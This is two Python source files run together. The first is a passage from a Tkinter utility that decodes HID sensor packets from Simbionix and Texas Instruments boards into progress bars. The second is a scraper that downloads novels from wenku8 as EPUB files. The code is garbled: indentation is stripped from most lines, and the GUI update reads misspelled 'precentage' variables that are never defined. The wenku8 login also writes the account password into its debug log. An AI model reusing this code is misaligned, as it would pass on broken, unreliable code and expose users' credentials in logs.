if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
# global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
# file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
            handler_elapsed = timer() - handle_time
            if handler_elapsed > 0.002:
                # if handler_elapsed > 0.02:
                # print("handler called: %.6f" % handler_elapsed)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
# if print_flag:
# print("command response: %s" % hexlify(value))
# print_flag = 0
# tool_size from CMOS: bytes 5..6
# 3f260000370b
    global hid_util_fault
    hid_util_fault = int(value[START_INDEX + 1]) & 0xF  # fault code: low nibble of the high status byte
digital = (int(value[START_INDEX + 1]) << 8) + int(value[START_INDEX + 0])
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in ANALOG_INDEX_LIST]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
tool_size = (int(value[CMOS_INDEX + 1]) << 8) + int(value[CMOS_INDEX])
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# 0674 fc41
# -62847372 = FC41 0674
# torque from Avago: bytes 6..9
    # 32-bit fields arrive with their 16-bit words swapped: reading bytes (2,3,0,1)
    # big-endian turns wire bytes 06 74 FC 41 into 0xFC410674 == -62847372.
    torque = (int(value[TORQUE_INDEX + 2]) << 24) + (int(value[TORQUE_INDEX + 3]) << 16) + (int(value[TORQUE_INDEX]) << 8) + int(value[TORQUE_INDEX + 1])
    insertion = (int(value[INSERTION_INDEX + 2]) << 24) + (int(value[INSERTION_INDEX + 3]) << 16) + (int(value[INSERTION_INDEX]) << 8) + int(value[INSERTION_INDEX + 1])
    if torque >= 2**31:  # >= so that -2**31 itself is converted too
        torque = torque - 2**32
if do_print:
print("Received data: %s" % hexlify(value))
# print("tool_size : %d" % tool_size)
# print("insertion : %d" % insertion , end="")
# print(" torque : %d" % torque)
clicker_counter = (int(value[COUNTER_INDEX+2 + 1]) << 8) + int(value[COUNTER_INDEX+2])
sleepTimer = (int(value[COUNTER_INDEX+4 + 1]) << 8) + int(value[COUNTER_INDEX+4])
encoder1 = analog[3]
encoder2 = analog[0]
encoder3 = analog[1]
encoder4 = analog[2]
MotorCur = analog[4]
clicker_analog = analog[5]
# ClickerRec = analog[6]
# batteryLevel = analog[6]
# ClickerRec is actually connected to Pin of the VREF+ that is on that input P5.0
batteryLevel = analog[7]
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# global file1
L = [ str(clicker_analog), "," ,"\n" ]
# file1.writelines(L)
bool_clicker = bool((digital >> 2) & 0x0001)
bool_reset = bool((digital >> 4) & 0x0001)
bool_red_handle = bool((digital >> 7) & 0x0001)
bool_ignore_red_handle = ignore_red_handle_state
if PRODUCT_ID != PRODUCT_ID_STATION:
int_hid_stream_channel1 = analog[1]
int_inner_handle_channel1 = analog[0]
else:
int_hid_stream_channel1 = insertion
int_inner_handle_channel1 = torque
int_hid_stream_channel2 = tool_size
int_inner_handle_channel2 = analog[3]
int_clicker = clicker_analog
int_sleepTimer = sleepTimer
int_batteryLevel = batteryLevel
int_MotorCur = MotorCur
int_counter = counter
int_hid_util_fault = hid_util_fault
int_clicker_counter = clicker_counter
int_hid_stream_insertion = insertion
    if PRODUCT_ID != PRODUCT_ID_STATION:
        percentage_hid_stream_channel1 = int((int_hid_stream_channel1 / 4096) * 100)
        percentage_inner_handle_channel1 = int((int_inner_handle_channel1 / 4096) * 100)
    else:
        percentage_hid_stream_channel1 = abs(int((int_hid_stream_channel1 / 1000) * 100))
        percentage_inner_handle_channel1 = abs(int((int_inner_handle_channel1 / 1000) * 100))
    percentage_hid_stream_channel2 = int((int_hid_stream_channel2 / 4096) * 100)
    percentage_inner_handle_channel2 = int((int_inner_handle_channel2 / 4096) * 100)
    percentage_clicker = int((int_clicker / 4096) * 100)
    # percentage_sleepTimer = int((int_sleepTimer / 600) * 100)
    percentage_sleepTimer = int(int_sleepTimer)  # raw value; the bar's maximum is set to 600 below
    percentage_batteryLevel = int((int_batteryLevel / 4096) * 100)
    percentage_MotorCur = int((int_MotorCur / 4096) * 100)
progressbar_style_hid_stream_channel1 = progressbar_styles[0]
progressbar_style_hid_stream_channel2 = progressbar_styles[1]
progressbar_style_inner_handle_channel1 = progressbar_styles[2]
progressbar_style_inner_handle_channel2 = progressbar_styles[3]
progressbar_style_clicker = progressbar_styles[4]
progressbar_style_sleepTimer = progressbar_styles[5]
progressbar_style_batteryLevel = progressbar_styles[6]
progressbar_style_MotorCur = progressbar_styles[7]
progressbar_hid_stream_channel1 = progressbars[0]
progressbar_hid_insertion = progressbars[0] #can I duplicate it?
progressbar_hid_stream_channel2 = progressbars[1]
progressbar_inner_handle_channel1 = progressbars[2]
progressbar_inner_handle_channel2 = progressbars[3]
progressbar_clicker = progressbars[4]
progressbar_sleepTimer = progressbars[5]
progressbar_batteryLevel = progressbars[6]
progressbar_MotorCur = progressbars[7]
checkbox_inner_clicker = inner_clicker
checkbox_red_handle = red_handle
checkbox_reset_check = reset_check
checkbox_ignore_red_handle = ignore_red_handle_checkbutton
entry_counter = counter_entry
entry_clicker_counter = clicker_counter_entry
entry_fault = fault_entry
progressbar_style_hid_stream_channel1.configure(
HID_STREAM_CHANNEL1_STYLE,
text=("%d" % int_hid_stream_channel1)
)
progressbar_style_hid_stream_channel2.configure(
HID_STREAM_CHANNEL2_STYLE,
text=("%d" % int_hid_stream_channel2)
)
progressbar_style_inner_handle_channel1.configure(
INNER_HANDLE_CHANNEL1_STYLE,
text=("%d" % int_inner_handle_channel1)
)
progressbar_style_inner_handle_channel2.configure(
INNER_HANDLE_CHANNEL2_STYLE,
text=("%d" % int_inner_handle_channel2)
)
progressbar_style_clicker.configure(
CLICKER_STYLE,
text=("%d" % int_clicker)
)
progressbar_style_sleepTimer.configure(
SLEEPTIMER_STYLE,
text=("%d" % sleepTimer)
)
progressbar_style_batteryLevel.configure(
BATTERY_LEVEL_STYLE,
text=("%d" % batteryLevel)
)
progressbar_style_MotorCur.configure(
MOTOR_CURRENT_STYLE,
text=("%d" % MotorCur)
)
# if ( batteryLevel <= 2310 ):
if ( batteryLevel <= 2288 ): # about 2.8 volt
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE,foreground="white", background="#d92929")
else:
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE, foreground="white", background="blue")
progressbar_hid_stream_channel1["value"] = precentage_hid_stream_channel1
progressbar_hid_stream_channel2["value"] = precentage_hid_stream_channel2
progressbar_inner_handle_channel1["value"] = precentage_inner_handle_channel1
progressbar_inner_handle_channel2["value"] = precentage_inner_handle_channel2
progressbar_clicker["value"] = precentage_clicker
progressbar_sleepTimer["value"] = precentage_sleepTimer
progressbar_sleepTimer["maximum"] = 600
progressbar_batteryLevel["value"] = precentage_batteryLevel
progressbar_MotorCur["value"] = precentage_MotorCur
update_checkbox(checkbox_inner_clicker, bool_clicker)
update_checkbox(checkbox_red_handle, bool_red_handle)
update_checkbox(checkbox_reset_check, bool_reset)
update_checkbox(checkbox_ignore_red_handle, bool_ignore_red_handle)
entry_counter.delete(0, tk.END)
entry_counter.insert(tk.END, "%d" % int_counter)
entry_clicker_counter.delete(0, tk.END)
entry_clicker_counter.insert(tk.END, "%d" % int_clicker_counter)
entry_fault.delete(0, tk.END)
entry_fault.insert(tk.END, "%d" % int_hid_util_fault)
root.update()
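# A minimal, equivalent sketch of the torque/insertion decode in handler() above
# (not called anywhere): the 32-bit fields arrive with their 16-bit words swapped,
# so reordering the bytes to (i+2, i+3, i, i+1) and unpacking them as a big-endian
# signed int reproduces the shift-and-wrap arithmetic, sign conversion included.
import struct

def decode_swapped_int32(buf, index):
    # word-swapped wire order -> big-endian signed int32
    return struct.unpack(">i", bytes((buf[index + 2], buf[index + 3], buf[index], buf[index + 1])))[0]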
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def my_channel_row(frame, row, label, style):
ttk.Label(frame,text=label).grid(row=row,sticky=tk.W)
row += 1
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
ttk.Label(frame,text="Channel 1").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
else:
ttk.Label(frame,text="Torque").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel1"%style))
progressbars.append(w)
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel2"%style))
progressbars.append(w)
w.grid(row=row,column=1)
return row + 1
def my_separator(frame, row):
ttk.Separator(
frame,
orient=tk.HORIZONTAL
).grid(
pady=10,
row=row,
columnspan=3,
sticky=(tk.W + tk.E)
)
return row + 1
def my_widgets(frame):
# Add style for labeled progress bar
for name in style_names:
style = ttk.Style(
frame
)
progressbar_styles.append(style)
style.layout(
name,
[
(
"%s.trough" % name,
{
"children":
[
(
"%s.pbar" % name,
{"side": "left", "sticky": "ns"}
),
(
"%s.label" % name,
{"sticky": ""}
)
],
"sticky": "nswe"
}
)
]
)
if name == SLEEPTIMER_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d9d9d9")
elif name == BATTERY_LEVEL_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d92929")
else:
# style.configure(name, background="lime")
style.configure(name, background="#06B025")
# print(style)
row = 0
# Outer Handle
ttk.Label(frame,text="HID Streaming Values").grid(row=row,sticky=tk.W)
row += 1
text_name = "Channel 1"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Insertion"
ttk.Label(frame,text=text_name).grid(row=row,column=0)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel1"))
progressbars.append(w)
w.grid(row=row,column=0)
    row -= 1  # go back one row for the column header
text_name = "Channel 2"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Tool Size"
ttk.Label(frame,text=text_name).grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel2"))
progressbars.append(w)
w.grid(row=row,column=1)
row += 1
    # Separator
    row = my_separator(frame, row)
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
row = my_channel_row(frame=frame,row=row,label="InnerHandle",style="InnerHandle")
else:
row = my_channel_row(frame=frame,row=row,label="PRODUCT_ID_STATION",style="InnerHandle")
    # Separator
    row = my_separator(frame, row)
# Clicker labels
ttk.Label(frame,text="InnerClicker").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="Clicker").grid(row=row,column=1)
ttk.Label(frame,text="ClickerCounter").grid(row=row,column=2)
row += 1
# Clicker data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global inner_clicker
inner_clicker = w
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style="Clicker")
progressbars.append(w)
w.grid(row=row,column=1)
# yg: adding clicker counter display
w = ttk.Entry(frame,width=20,)
global clicker_counter_entry
clicker_counter_entry = w
w.grid(
#padx=10,#pady=5,
row=row,
column=2,#sticky=tk.W,
)
row += 1
    # Separator
    row = my_separator(frame, row)
# Red handle and reset button labels
ttk.Label(frame,text="RedHandle").grid(row=row,column=0,sticky=tk.W)
ttk.Label(frame,text="ResetButton").grid(row=row,column=1)
ttk.Label(frame,text="IgnoreRedHandlefault").grid(row=row,column=2)
row += 1
# Red handle and reset button data
w = tk.Checkbutton(frame,state=tk.DISABLED)
global red_handle
red_handle = w
w.grid(row=row,column=0)
w = tk.Checkbutton(frame,state=tk.DISABLED)
global reset_check
reset_check = w
w.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Start streaming",command = streaming_button_CallBack)
red_handle_ignore.grid(row=row,column=3)
# checkbox for the ignore red handle
w = tk.Checkbutton(frame,state=tk.DISABLED)
# global ignore_red
# ignore_red = w
global ignore_red_handle_checkbutton
ignore_red_handle_checkbutton = w
w.grid(row=row,column=2)
row += 1
    # Separator
    row = my_separator(frame, row)
# Counter
ttk.Label(frame,text="PacketsCounter:").grid(row=row,column=0,sticky=tk.E,)
w = ttk.Entry(frame,width=20,
# """state=tk.DISABLED"""
)
global counter_entry
counter_entry = w
w.grid(padx=10,pady=5,row=row,column=1,columnspan=2,sticky=tk.W,)
# HID_Util Fault indication
ttk.Label(frame,text="Faultindication:").grid(row=row,column=1,sticky=tk.E,)
w = ttk.Entry(
frame,
width=20,
)
global fault_entry
fault_entry = w
w.grid(
padx=10,
pady=5,
row=row,
column=2,
columnspan=2,
sticky=tk.W,
)
row += 1
    # Separator
    row = my_separator(frame, row)
# sleepTimer
ttk.Label(
frame,
text="Sleep Timer"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="sleepTimer"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
    # Separator
    row = my_separator(frame, row)
# battery level
ttk.Label(
frame,
text="battery level"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="batteryLevel"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
    # Separator
    row = my_separator(frame, row)
# Motor Cur
ttk.Label(
frame,
text="Motor Current"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="motorCurrent"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
    # Separator
    row = my_separator(frame, row)
red_handle_ignore = tk.Button(frame,text ="Get Board Type",command = board_type_button_callback)
red_handle_ignore.grid(row=row,column=0)
red_handle_ignore = tk.Button(frame,text ="Keep alive (fast BLE)",command = alive_button_CallBack)
red_handle_ignore.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Moderate BLE",command = moderate_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
row += 1
    row = my_separator(frame, row)
red_handle_ignore = tk.Button(frame,text ="BSL !!!(DONT PRESS)",command = BSL_mode_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
    # Initialize the flags according to the command line arguments
    avail_vid = args.vendor_id is not None
    avail_pid = args.product_id is not None
    avail_path = args.path is not None
    id_mode = avail_pid and avail_vid
    path_mode = avail_path
    default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
    if (not avail_path) and (avail_pid != avail_vid):
        print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
        PRODUCT_ID = args.product_id[0]  # overrides the default, e.g. 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
            except Exception:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
                    except Exception:
print("wrong ID2")
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = PRODUCT_ID_CTAG
print("try with PID = %X " % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
if device is not None:
device.write(DEFAULT_WRITE_DATA)
                except Exception:
print("wrong ID3")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
                    except Exception:
print("wrong ID4")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
global special_cmd
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
# root. destroy()
elif PRODUCT_ID == PRODUCT_ID_CTAG:
print("BOARD_TYPE: CTAG --- new in bsl.exe")
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
# # Initialize the main window
# global root
# root = tk.Tk()
# root.title("HID_Util")
#
# # Initialize the GUI widgets
# my_widgets(root)
        # Create the thread that runs the device read/write loop
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
global WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
print("WRITE_DATA == WRITE_DATA_CMD_B")
# threading.Thread(target=gui_loop, args=(device,), daemon=True).stop()
print(" Recording Ended !!!")
print(" ")
print(" Please press <Enter> to Exit")
input()
# Run the GUI main loop
# root.mainloop()
finally:
# global file1
# file1.close() #to change file access modes
        if device is not None:
device.close()
if __name__ == "__main__":
main()
|
wk8.py
|
import os, re, threading
import bs4, requests as R
from bs4 import BeautifulSoup as Soup
from lib import epub
from lib.logger import getLogger
from lib.constants import *
def req(method : str, url : str, headers : dict = {}, payload : dict = {}, cookies = None):
return R.request(method, url, headers = headers | USER_AGENT, data = payload, cookies = cookies)
def reqr(soup : bool, method : str, url : str, headers : dict = {}, payload : dict = {}, cookies = None):
res = R.request(method, url, headers = headers | USER_AGENT, data = payload, cookies = cookies)
html = res.content.decode("gbk", errors="ignore")
if soup: return res, html, Soup(html, PARSER)
else: return res, html
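# Note: the "headers | USER_AGENT" dict-union above requires Python 3.9+;
# on older interpreters use {**headers, **USER_AGENT} instead.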
mxLen = 0
def progressBar(pre, x, y):
global mxLen
print(' '*(mxLen * 2), end='\r')
CNT = 20
spc = CNT * x // y
p = "%s: %d/%d [%s%s]" % (pre, x,y, "=" * spc, "." * (CNT - spc))
mxLen = max(mxLen, len(p))
print(p, end='\r')
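# Hypothetical usage sketch for progressBar (not part of the downloader): renders an
# in-place bar such as "download: 7/20 [=======.............]" on a single line.
def _demo_progress_bar():
    import time
    for i in range(1, 21):
        progressBar("download", i, 20)
        time.sleep(0.05)
    print()  # move off the carriage-returned line once finished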
class Wenku8:
def __init__(self):
self.cookies = ""
self.cookie_jar = None
self.image_count = 0
self.image_total = 0
self.book = None
self.L = getLogger("wenku8")
def login(self, username= OPT['account'][0], password= OPT['account'][1]):
self.L.debug("正在登陆: 使用账号 %s 密码 %s" % (username, password))
data = {'action': 'login', 'jumpurl': '', 'username': username, 'password': password}
res, html = reqr(False, 'post', API['login'], CONTENT_TYPES['post'], data)
        if '登录成功' not in html:  # the site's "login succeeded" marker; must stay in Chinese
            self.L.error("Login failed: response was %s" % html)
return False
self.cookies = ''
for key, value in res.cookies.items():
self.cookies += "%s=%s;" % (key, value)
self.L.debug("登陆成功。Cookie: %s" % self.cookies)
self.cookie_jar = res.cookies
return True
def is_login(self):
return len(self.cookies) != 0 and self.cookie_jar is not None
def search(self, key: str):
if not self.is_login():
self.login()
if not self.is_login():
self.L.error("登陆失败,无法搜索。")
return False
m1 = self.search_one(API["search1"], key)
m2 = self.search_one(API["search2"], key)
self.L.debug("搜索 %s: 结果共 %d 条,API 1: %d, API 2: %d" % (key, len(m1) + len(m2), len(m1), len(m2)))
return m1 + m2
def search_one(self, API: str, key: str):
if not self.is_login():
return []
headers = {'Cookie': self.cookies}
encodings = key.encode('gbk').hex().upper()
key_arg = ''
for i in range(0, len(encodings), 2):
key_arg += "%%%s%s" % (encodings[i], encodings[i + 1])
self.L.debug("搜索: URL: %s" % API % key_arg)
res, html, soup = reqr(True, "get", API % key_arg, headers, {}, self.cookie_jar)
if '推一下' in html:
title = soup.find_all('b')[1].get_text()
bid = ''
for n in re.findall(r'\d', res.url)[1:]:
bid = bid + n
bid = int(bid)
try:
cover = soup.find_all('img')[1].get_attribute_list('src')[0]
except IndexError:
cover = None
try:
status = soup.find_all('table')[0].find_all('tr')[2].get_text().replace('\n', ' ')
except IndexError:
status = None
try:
brief = soup.find_all('table')[2].find_all('td')[1].find_all('span')[4].get_text()
except IndexError:
spans = soup.find_all('span')
for i in range(len(spans)):
if '内容简介' in spans[i].get_text():
brief = spans[i + 1].get_text()
book = {
'title': title, 'bid': bid, 'cover': cover, 'status': status, 'brief': brief
}
self.L.debug("搜索: 书名 %s, ID %d, 封面链接 %s, 状态 %s, 简介 %s" % (title, bid, cover, status, brief))
return [book, ]
td = soup.find('td')
if td is None: return []
books = []
for content in td.children:
if not isinstance(content, bs4.element.Tag):
continue
title = content.find_all('a')[1].get_text()
url = content.find_all('a')[1].get_attribute_list('href')[0]
numbers = re.findall(r'\d', url)[1:]
bid = ''
for n in numbers:
bid = bid + n
bid = int(bid)
cover = content.find_all('img')[0].get_attribute_list('src')[0]
status = content.find_all('p')[0].get_text()
brief = content.find_all('p')[1].get_text()[3:]
book = {
'title': title, 'bid': bid, 'cover': cover, 'status': status, 'brief': brief
}
self.L.debug("搜索: 书名 %s, ID %d, 封面链接 %s, 状态 %s, 简介 %s" % (title, bid, cover, status, brief))
books.append(book)
return books
def bookinfo(self, book_id: int):
url = "%s%s" % (API["book"] % (("%04d" % book_id)[0], book_id), "index.htm")
self.L.debug("图书信息: %d: URL %s" % (book_id, url))
__, html, soup = reqr(True, "get", url)
table = soup.select('table')
if len(table) == 0:
self.L.error("图书信息: 无法获取,更多信息请打开调试模式")
self.L.debug("返回页面: %s" % html)
return None
table = table[0]
if len(soup.select("#title")) == 0:
self.L.error("图书信息: 该书不存在。")
return None
title = soup.select("#title")[0].get_text()
author = soup.select("#info")[0].get_text().split('作者:')[-1]
url_cover = API["img"] % (("%04d" % book_id)[0], book_id, book_id)
brief = ''
url = API["info"] % (book_id)
__, html, soup = reqr(True, "get", url)
update = ''
for td in soup.find_all('td'):
if '最后更新' in td.get_text():
update = td.get_text()[5:]
iscopyright = '因版权问题,文库不再提供该小说的在线阅读与下载服务!' not in soup.get_text()
spans = soup.select('span')
for i in range(len(spans)):
span = spans[i]
if '内容简介' in span.get_text():
brief = spans[i + 1].get_text()
self.L.debug("图书信息: %d: 标题 %s, 作者 %s, 简介 %s, 封面链接 %s, 版权 %s, 最后更新 %s" % (book_id, title, author, brief, url_cover, str(iscopyright), update))
return {
"id": book_id,
"name": title,
"author": author,
"brief": brief,
"cover": url_cover,
'copyright': iscopyright,
'update': update
}
def get_page(self, url_page: str, title: str = ''):
__, html = reqr(False, 'get', url_page)
html = re.sub(r"\[sup\](.{1,50})\[\/sup\]", r"<sup>\1</sup>", html)
soup = Soup(html, PARSER)
content = soup.select('#content')[0]
[s.extract() for s in content("ul")] # 去除 <ul>
return "<h1>%s</h1>%s" % (title, content.prettify(formatter="html"))
def fetch_img(self, url_img: str):
self.L.debug("图片链接为: %s" % url_img)
data_img = req('get', url_img).content
filename = os.path.basename(url_img)
self.book.addImage(filename, data_img)
self.image_count += 1
progressBar(self.chapter_name + " 插图", self.image_count, self.image_total)
return True
def isImg(self, x):
for i in IMG_PREFIXES:
if i in x: return True
return False
def fetch_chapter(self, a, order: int):
title_page = a.get_text()
url_page = "%s%s" % (API['book'] % (("%04d" % self.book.book_id)[0], self.book.book_id), a.get('href'))
self.L.debug("%s下载: %s: %s - %s" % ("插图" if title_page == "插图" else "章节", title_page, a.get('href'), url_page))
soup = Soup(self.get_page(url_page, title=title_page), PARSER)
imgcontent = soup.select(".imagecontent")
if not OPT['noImage']:
if len(imgcontent) > 0:
self.L.debug("图书下载: %s: 可能的封面: %s" % (title_page, imgcontent[0].get("src")))
self.cover_frombook = imgcontent[0].get("src")
if OPT['downloadImage']:
img_pool = []
imgcontent = [i for i in filter(lambda x: self.isImg(x.get("src")), imgcontent)]
self.image_total += len(imgcontent)
for img in imgcontent:
url_img = img.get("src")
self.L.debug("%s下载: 图片: %s in %s" % ("插图" if title_page == "插图" else "章节", url_img, title_page))
img["src"] = "images/" + os.path.basename(img.get("src"))
if img.parent.name == 'a':
img.parent.unwrap()
th = threading.Thread(target=self.fetch_img, args=(url_img,), daemon=True)
if OPT['imgPool']: th.start()
img_pool.append(th)
                for it in img_pool:  # when imgPool is off: no multithreading, one-by-one is significantly quicker
if not OPT['imgPool']: it.start()
it.join()
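                # Design note: with OPT['imgPool'] set, all download threads were started
                # above and are only joined here (concurrent); otherwise each thread is
                # started right before its join, i.e. images download strictly in series.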
else:
for img in imgcontent:
if img.parent.name == 'a':
img.parent.unwrap()
else:
for i in imgcontent:
if i.parent.name == 'a':
i.parent.unwrap()
i.extract()
self.chapter_count += 1
progressBar(self.chapter_name, self.chapter_count, self.chapter_total)
self.book.addChapter(order, title_page, soup.prettify(formatter="html"))
    def get_volume(self, book_id: int, book_info: dict, volume_index: int, hrefs: list, sub_title: str, base_title: str, author: str, backup_cover: str):  # hrefs: list of <a> Tags
self.cover_frombook = None
self.book = epub.Book({
"identifier": "%d-%.3d" % (book_id, volume_index),
"title": "%s %s" % (base_title, sub_title),
"language": "zh",
"creator": author,
"contributor": "wenku8toepub",
"publisher": "wenku8",
"date": book_info["update"],
"description": book_info["brief"]
}, book_id, "%s %s" % (base_title, sub_title), len(hrefs))
pool = []
self.image_count = self.image_total = self.chapter_count = 0
self.chapter_name = "%s %s" % (base_title, sub_title)
self.chapter_total = len(hrefs)
for index, href in enumerate(hrefs):
th = threading.Thread(target=self.fetch_chapter, args=(href, index), daemon=True)
if OPT['chapterPool']: th.start()
pool.append(th)
for th in pool:
if not OPT['chapterPool']: th.start()
th.join()
        fn = os.path.join(OPT['outputDir'], "[%s][%s][%.3d]%s.epub" % (author, base_title, volume_index + 1, sub_title))
if OPT['noImage'] or not OPT['downloadCover']:
# self.L.info("图书分卷 %s %s: 保存到 %s" % (base_title, sub_title, fn))
return self.book.finalize(fn, None, None)
else:
if self.cover_frombook is None:
cover_file = backup_cover
else:
cover_file = self.cover_frombook
            cover_data = req('get', cover_file).content
__, cover_ext = os.path.splitext(cover_file)
self.L.debug("图书分卷 %s %s: 采用封面 [%d]: %s" % (base_title, sub_title, len(cover_data), cover_file))
# self.L.info("图书分卷 %s %s: 保存到 %s" % (base_title, sub_title, fn))
return self.book.finalize(fn, cover_data, cover_ext)
    def get_book(self, book_id: int, book_info: dict):
book_url = "%s%s" % (API['book'] % (("%04d" % book_id)[0], book_id), "index.htm")
